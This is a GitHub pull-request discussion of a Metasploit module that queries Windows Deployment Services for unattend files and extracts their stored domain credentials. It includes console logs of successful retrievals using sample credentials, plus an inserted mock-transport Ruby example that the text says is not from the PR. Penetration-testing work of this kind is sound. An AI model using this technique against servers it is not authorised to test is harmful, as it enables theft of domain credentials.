
Windows Deployment Services (x86) #2511

Closed
wants to merge 5 commits into from

Conversation

Meatballs1
Contributor

@todb-r7

There's really no point supporting NDR64 syntax as x64 systems will talk NDR32 without issue. So dropped back to the default syntax and corrected the module. Also performed various tidyup tasks after ~12 months more MSF dev experience.

Should play nicely with 2k3 x86 -> 2k8 x64 and I assume 2k12...

Compatible with both x86 and x64 systems.
Tidy up the module...
Also tidyup indents and use predefined UUID syntax.
@todb-r7

todb-r7 commented Oct 14, 2013

Related to #1420

@todb-r7

todb-r7 commented Oct 14, 2013

So, sometimes I get this:

[-] 192.168.145.60:5040 error: undefined method `+' for nil:NilClass

I think there are a couple over-eager rescues in here.

Also, I often end up with a bunch of open connections. When the module ends, I'm still left with:

$ netstat -an | grep 5040
tcp     1256      0 192.168.145.1:33567     192.168.145.60:5040     ESTABLISHED

Normally, hanging connections like this get handled with cleanup but again, I bet the rescues are munging that up.

Here's a more normal run:

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[-] Error code received for X64: 26210
[*] Sending X86 Client Unattend request ...
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] Error code received for IA64: 26210
[*] Skipping ARM architecture due to adv option
[-] No Unattend files received, service is unlikely to be configured for completely unattended installation.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

and now I have another connection:

$ netstat -an | grep 5040
tcp     1256      0 192.168.145.1:33567     192.168.145.60:5040     ESTABLISHED
tcp     1544      0 192.168.145.1:56180     192.168.145.60:5040     ESTABLISHED

Going to see what I can do to detangle this.

@todb-r7

todb-r7 commented Oct 14, 2013

It feels like when you open the DCERPC connection to WDS, if you never close it, that WDS server is out of the unattend.xml-serving business.

@todb-r7

todb-r7 commented Oct 14, 2013

This is on my Win2k3 machine, btw.

@todb-r7

todb-r7 commented Oct 14, 2013

By the way, the + rescue isn't consistent. Here's a good run, after restarting WDS:

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[*] Raw version of X64 saved as: /home/todb/.msf4/loot/20131014121544_default_192.168.145.60_windows.unattend_224027.txt
[+] Retrived wds credentials for X64
[*] Sending X86 Client Unattend request ...
[*] Received response ...
[-] Error code received for X86: 26210
[*] Sending IA64 Client Unattend request ...
[*] Skipping ARM architecture due to adv option

Windows Deployment Services
===========================

 Architecture  Type  Domain        Username         Password
 ------------  ----  ------        --------         --------
 X64           wds   Fabrikam.com  my_username-x64  my_password-x64

@todb-r7

todb-r7 commented Oct 14, 2013

So, it looks like for each arch, you need to set up the handle, get the file, and then tear down the handle.

@todb-r7

todb-r7 commented Oct 14, 2013

Sometimes, the returned data (dcerpc.last_response.stub_data) gets chopped off. Hmm. Here's an inspect:

[!] "D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x18\t\x00\x00\x00\x00\x00\x00<?xml version=\"1.0\" ?> \r\n<unattend xmlns=\"urn:schemas-microsoft-com:unattend\">\r\n   <settings pass=\"windowsPE\">\r\n      <component name=\"Microsoft-Windows-Setup\" publicKeyToken=\"31bf3856ad364e35\" \r\nlanguage=\"neutral\" versionScope=\"nonSxS\" processorArchitecture=\"x86\">\r\n         <WindowsDeploymentServices>\r\n            <Login>\r\n               <WillShowUI>OnError</WillShowUI>\r\n               <Credentials>\r\n                     <Username>my_username-x64</Username>\r\n                     <Domain>Fabrikam.com</Domain>\r\n                     <Password>my_password-x64</Password>\r\n                  </Credentials>\r\n               </Login>\r\n            <ImageSelection>\r\n               <WillShowUI>OnError</WillShowUI>\r\n               <InstallImage>\r\n                  <ImageName>Windows Vista with Office</ImageName>\r\n                  <ImageGroup>ImageGroup1</ImageGroup>\r\n                  <Filename>Install.wim</Filename>\r\n               </InstallImage>\r\n                  <InstallTo>\r\n                  <DiskID>0</DiskID>\r\n                  <PartitionID>1</PartitionID>\r\n               </InstallTo>\r\n            </ImageSelection>\r\n         </WindowsDeploymentServices>\r\n         <Di"

@todb-r7

todb-r7 commented Oct 14, 2013

So, when it works, after this next commit, I often get this:

sf auxiliary(windows_deployment_services) > run

[*] Asking for architecture X64
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[*] Raw version of X64 saved as: /home/todb/.msf4/loot/20131014140239_default_192.168.145.60_windows.unattend_128972.txt
[+] Retrived wds credentials for X64
[*] Asking for architecture X86
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X86 Client Unattend request ...
[*] Received response ...
[-] Error code received for X86: 26210
[*] Asking for architecture IA64
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] No Unattend received for IA64 architecture
[*] Skipping ARM architecture due to adv option

Windows Deployment Services
===========================

 Architecture  Type  Domain        Username         Password
 ------------  ----  ------        --------         --------
 X64           wds   Fabrikam.com  my_username-x64  my_password-x64

However, I often get incompletes, and it looks like the socket read is cutting off between packets. Here comes a pull request; I'm thinking we need to be slower on the RPC read in order to actually pick up the data, then close out the connection. It feels like, on Win2k3, that we're running into a locking situation on the WDS server.
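The two failure modes discussed in this thread, a socket read that stops between packets and a per-architecture handle that is never torn down, are shown together below as an added example. This is not code from this PR or from Metasploit's WDS module; it uses a constructed mock transport in place of Rex's DCERPC client, and the `ERR:<code>` framing, the chunk boundaries and the `RecordingOpener` helper are assumptions made for the mock, not the WDS wire format. The pattern it demonstrates is the one described above: bind once per architecture, keep reading until the response is complete, and close the handle in `ensure` so that a parse failure or a narrow rescue cannot leave the connection hanging.

```ruby
# Added example (not code from this PR or from Metasploit): per-architecture
# bind / read-until-complete / tear-down, with a constructed mock transport.
# The "ERR:<code>" frame and the chunk sizes below are assumptions for the mock.

# Error code the thread shows for "no unattend file for this architecture".
WDS_NO_UNATTEND = 26210

# Mock handle: hands back the response in chunks, as a socket read does when
# the data arrives across several packets. nil means the peer stopped sending.
class MockWdsHandle
  attr_reader :closed

  def initialize(chunks)
    @chunks = chunks.dup
    @closed = false
  end

  def read
    raise IOError, 'read on closed handle' if @closed
    @chunks.shift
  end

  def close
    @closed = true
  end
end

# The response is complete once it is an error frame or the XML root is closed.
def stub_complete?(buf)
  buf.start_with?('ERR:') || buf.include?('</unattend>')
end

# Keep reading until the response is complete or the peer stops sending,
# rather than treating the first chunk as the whole stub.
def read_stub(handle, max_reads: 16)
  buf = +''
  max_reads.times do
    chunk = handle.read
    break if chunk.nil? || chunk.empty?
    buf << chunk
    break if stub_complete?(buf)
  end
  buf
end

# Classify a buffer as [:error, code], [:malformed, nil], [:incomplete, nil]
# or [:unattend, { user:, domain: }]. String matching stands in for a real
# XML parser here; the completeness check is the point of the example.
def parse_stub(buf)
  return [:error, buf[4..].to_i] if buf.start_with?('ERR:')
  return [:malformed, nil] unless buf.include?('<unattend')
  return [:incomplete, nil] unless buf.include?('</unattend>')
  user   = buf[%r{<Username>([^<]*)</Username>}, 1]
  domain = buf[%r{<Domain>([^<]*)</Domain>}, 1]
  [:unattend, { user: user, domain: domain }]
end

# One handle per architecture: bind, read, then tear down in `ensure` so a
# parse error or a transport error cannot leave the connection open.
# Only the error we expect (IOError) is rescued; anything else propagates.
def fetch_unattend(arch, opener)
  handle = opener.call(arch)
  begin
    parse_stub(read_stub(handle))
  rescue IOError => e
    [:transport_error, e.message]
  ensure
    handle.close
  end
end

def collect_unattend(archs, opener)
  archs.each_with_object({}) { |arch, acc| acc[arch] = fetch_unattend(arch, opener) }
end

# Constructed sample responses: X64 arrives in two chunks, X86 is an error
# frame, IA64 is cut off mid-document (like the inspect output in the thread).
X64_XML = "<?xml version=\"1.0\" ?>\r\n<unattend xmlns=\"urn:schemas-microsoft-com:unattend\">\r\n" \
          "<Credentials><Username>my_username-x64</Username><Domain>Fabrikam.com</Domain>" \
          "<Password>my_password-x64</Password></Credentials>\r\n</unattend>"

SAMPLE_RESPONSES = {
  'X64'  => [X64_XML[0, 60], X64_XML[60..]],
  'X86'  => ["ERR:#{WDS_NO_UNATTEND}"],
  'IA64' => [X64_XML[0, 80]]
}.freeze

# Opener that records every handle so a caller can verify all were closed.
class RecordingOpener
  attr_reader :handles

  def initialize(responses)
    @responses = responses
    @handles = []
  end

  def call(arch)
    h = MockWdsHandle.new(@responses.fetch(arch))
    @handles << h
    h
  end
end

# Runs the three architectures and reports whether every handle got closed.
def demo
  opener = RecordingOpener.new(SAMPLE_RESPONSES)
  results = collect_unattend(%w[X64 X86 IA64], opener)
  [results, opener.handles.all?(&:closed)]
end

if __FILE__ == $PROGRAM_NAME
  results, all_closed = demo
  results.each { |arch, (status, detail)| puts "#{arch}: #{status} #{detail.inspect}" }
  puts "all handles closed: #{all_closed}"
end
```

Two design choices matter here. `read_stub` stops on a positive completeness signal, not on "got some bytes", which is what turns the truncated `<Di` case into an explicit `:incomplete` result instead of a `NoMethodError` on nil further down. And the rescue inside `fetch_unattend` is narrow and sits beside an `ensure`, so the close always runs but unexpected exceptions still surface rather than being swallowed by an over-eager `rescue`.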

@todb-r7

todb-r7 commented Oct 14, 2013

See Meatballs1#28

@todb-r7

todb-r7 commented Oct 14, 2013

Note that all of my problems may just boil down to my crummy 32-bit server. @Meatballs1 may have never seen these protocol snafus in 64-bit land, and this PR #2511 does indeed solve the fundamental cross-compat issues.

If I don't get any feedback on this in the next hour or so, I'll land this, and we can tinker with Meatballs1#28 in the meantime.

@todb-r7

todb-r7 commented Oct 14, 2013

Regardless of Meatballs1#28, this PR and 50b1dd9 could be landed right now to just deal with the 32-bit RPC transfer syntax and avoid the NoMethodError on nil.

@todb-r7

todb-r7 commented Oct 14, 2013

So, I'm still racing DCERPC, looks like, but now my sessions are at least closing cleanly. I'll land this now to get around those problems.

msf auxiliary(windows_deployment_services) > run

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[-] Incomplete transmission or malformed unattend file.
[*] Sending X86 Client Unattend request ...
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] Error code received for IA64: 26210
[*] Skipping ARM architecture due to adv option
[-] No Unattend files received, service is unlikely to be configured for completely unattended installation.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(windows_deployment_services) > run

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[-] Error code received for X64: 26210
[*] Sending X86 Client Unattend request ...
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] Error code received for IA64: 26210
[*] Skipping ARM architecture due to adv option
[-] No Unattend files received, service is unlikely to be configured for completely unattended installation.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(windows_deployment_services) > run

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[*] Raw version of X64 saved as: /home/todb/.msf4/loot/20131014161453_wut_192.168.145.60_windows.unattend_704127.txt
[+] Retrived wds credentials for X64
[*] Sending X86 Client Unattend request ...
[*] Received response ...
[-] Error code received for X86: 26210
[*] Sending IA64 Client Unattend request ...
[*] Skipping ARM architecture due to adv option

Windows Deployment Services
===========================

 Architecture  Type  Domain        Username         Password
 ------------  ----  ------        --------         --------
 X64           wds   Fabrikam.com  my_username-x64  my_password-x64

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(windows_deployment_services) > 
